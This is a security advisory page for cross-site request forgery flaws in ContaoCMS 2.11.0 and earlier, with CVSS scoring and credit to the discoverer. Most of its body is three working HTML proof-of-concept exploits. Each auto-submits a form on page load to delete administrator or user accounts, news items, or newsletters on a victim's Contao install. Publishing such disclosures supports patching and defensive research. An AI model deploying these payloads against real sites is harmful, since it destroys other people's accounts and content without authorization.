ContaoCMS 2.11.0 Cross Site Request Forgery

2012-02-27 / 2012-03-21
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : ContaoCMS (fka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article) # Date : 25-02-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Software link : http://www.contao.org/en/download.html # Vendor site : http://www.contao.org # Version : 2.11.0 (latest) and lower # Tested on : Debian Squeeze (6.0) +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 2.1 Delete Administrators or Users 2.2 Delete News 2.3 Delete Newsletter +--------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that is easy to maintain". 2)Vulnerabilities Description Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages (articles, news, newsletter and so on). 2.1 Delete Administrators or Users <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to delete ADMIN/USER account</H2> <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2"> </body> </html> Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase. 2.2 Delete News <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to delete News</H2> <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1"> </form> </body> </html> 2.3 Delete Newsletter <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to delete Newsletter</H2> <form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1"> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------+

References:

http://ivanobinetti.com
http://www.contao.org/en/download.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top